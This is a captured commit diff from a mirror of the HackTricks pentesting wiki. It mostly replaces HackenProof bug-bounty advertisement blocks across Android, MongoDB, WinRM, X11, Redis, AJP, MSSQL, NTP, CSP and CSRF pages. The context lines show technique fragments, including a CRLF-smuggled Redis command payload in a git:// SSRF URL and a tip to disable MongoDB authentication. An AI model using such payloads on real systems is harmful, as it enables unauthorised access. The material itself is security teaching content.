0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

hp

This commit is contained in:
carlospolop 2023-07-14 17:03:41 +02:00
parent 6277fe6f8b
commit d84af2b1f5
16 changed files with 491 additions and 237 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

102
mobile-pentesting/android-app-pentesting/README.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Android Applications Basics
@ -58,15 +65,22 @@ package:/data/app/com.android.insecurebankv2-Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
```
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Static Analysis
@ -247,15 +261,22 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
[content-protocol.md](content-protocol.md)
{% endcontent-ref %}
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Dynamic Analysis
@ -497,15 +518,22 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Automatic Analysis
@ -706,15 +734,22 @@ It is able to:
Useful to detect malware: [https://koodous.com/](https://koodous.com)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Obfuscating/Deobfuscating code
@ -787,15 +822,22 @@ For more information visit:
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

51
mobile-pentesting/android-app-pentesting/android-applications-basics.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Android Security Model
@ -129,15 +136,22 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If youve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Intents
@ -456,15 +470,22 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

34
network-services-pentesting/27017-27018-mongodb.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Basic Information
@ -122,15 +129,22 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

51
network-services-pentesting/5985-5986-pentesting-winrm.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## WinRM
@ -160,15 +167,22 @@ winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## WinRM connection in linux
@ -324,15 +338,22 @@ Entry_2:
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

35
network-services-pentesting/6000-pentesting-x11.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Basic Information
@ -165,17 +172,23 @@ Now as can be seen below we have complete system access:
* `port:6000 x11`
\`\`
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

51
network-services-pentesting/6379-pentesting-redis.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Basic Information
@ -147,15 +154,22 @@ HGET <KEY> <FIELD>
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Redis RCE
@ -326,17 +340,22 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
\_\_
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
**HackenProof is home to all crypto bug bounties.**
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🐞 Read web3 bug tutorials
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
🔔 Get notified about new bug bounties
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
💬 Participate in community discussions
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

34
network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Basic Information
@ -179,15 +186,22 @@ curl http://127.0.0.1:80
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

51
network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Basic Information
@ -381,15 +388,22 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## MSSQL Privilege Escalation
@ -527,15 +541,22 @@ You probably will be able to **escalate to Administrator** following one of thes
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## HackTricks Automatic Commands

34
network-services-pentesting/pentesting-ntp.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Basic Information
@ -92,15 +99,22 @@ Entry_2:
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

51
pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## What is CSP
@ -469,15 +476,22 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
Trick from [**here**](https://ctftime.org/writeup/29310).
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## Unsafe Technologies to Bypass CSP
@ -597,15 +611,22 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
<details>

51
pentesting-web/csrf-cross-site-request-forgery.md
View File

@ -12,15 +12,22 @@
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
**HackenProof is home to all crypto bug bounties.**
🐞 Read web3 bug tutorials
**Get rewarded without delays**\
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.
🔔 Get notified about new bug bounties
**Get experience in web3 pentesting**\
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.
💬 Participate in community discussions
**Become the web3 hacker legend**\
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.
[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks!
{% embed url="https://hackenproof.com/register" %}
## What is CSRF?
@ -185,15 +192,22 @@ To set the domain name of the server in the URL that the Referrer is going to se
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
